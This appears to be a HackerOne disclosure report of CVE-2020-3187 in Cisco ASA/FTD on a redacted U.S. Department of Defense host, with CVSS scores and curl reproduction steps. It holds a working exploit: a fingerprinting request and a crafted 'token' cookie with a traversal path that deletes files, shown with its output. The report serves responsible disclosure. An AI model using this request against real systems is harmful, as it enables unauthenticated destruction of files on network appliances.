Lucene search

K
hackeroneDwisiswant0H1:978335
HistorySep 10, 2020 - 11:22 a.m.

U.S. Dept Of Defense: Unauthenticated Arbitrary File Deletion ("CVE-2020-3187") in ████████

2020-09-1011:22:21
dwisiswant0
hackerone.com
89

9.1 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

7.5 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

0.974 High

EPSS

Percentile

99.9%

Description:

A vulnerability in the interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and obtain read and delete access to sensitive files.

Vulnerable host:

  • https://██████/

Impact

An exploit could allow the attacker to view or delete arbitrary files on the system.

Step-by-step Reproduction Instructions

  1. Identifying vulnerable host by send request to /+CSCOE+/session_password.html.
> curl -skiL "https://██████/+CSCOE+/session_password.html"
GET /+CSCOE+/session_password.html HTTP/1.1
Host: ███████
User-Agent: curl/7.47.0
Accept: */*

If the target is vulnerable, the response header will display webvpn header, like:

HTTP/1.1 200 OK
Content-Type: text/plain
Content-Length: 0
Cache-Control: no-cache
Pragma: no-cache
Connection: Keep-Alive
Date: Thu, 10 Sep 2020 04:14:27 GMT
X-Frame-Options: SAMEORIGIN
webvpn: 

  1. Perform exploits to delete files by adding token in cookie header request.

For example, I want to delete this (https://████/+CSCOU+/csco_logo.gif) file.

> curl -Ik https://██████████/+CSCOU+/csco_logo.gif
< HTTP/1.1 200 OK
< Content-Type: image/gif
< Content-Length: 2678
< Cache-Control: max-age=6000
< Connection: Keep-Alive
< Date: Thu, 10 Sep 2020 04:19:54 GMT
< X-Frame-Options: SAMEORIGIN

Request:

> curl -skiL "https://███████/+CSCOE+/session_password.html" \
  -H "Cookie: token=../+CSCOU+/csco_logo.gif" 
GET /+CSCOE+/session_password.html HTTP/1.1
Host: ███████
Cookie: token=../+CSCOU+/csco_logo.gif
User-Agent: curl/7.47.0
Accept: */*

The following response is shown:

HTTP/1.1 200 OK
Content-Type: text/plain
Content-Length: 0
Cache-Control: no-cache
Pragma: no-cache
Connection: Keep-Alive
Date: Thu, 10 Sep 2020 04:21:02 GMT
X-Frame-Options: SAMEORIGIN
webvpn: 

File deleted successfully:

> curl -Ik https://██████████/+CSCOU+/csco_logo.gif
< HTTP/1.1 404 Not Found
< Cache-Control: no-cache
< Pragma: no-cache
< Connection: Close
< Date: Thu, 10 Sep 2020 04:21:20 GMT
< X-Frame-Options: SAMEORIGIN

Suggested Mitigation/Remediation Actions

Impact

An exploit could allow the attacker to view or delete arbitrary files on the system.

9.1 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

7.5 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

0.974 High

EPSS

Percentile

99.9%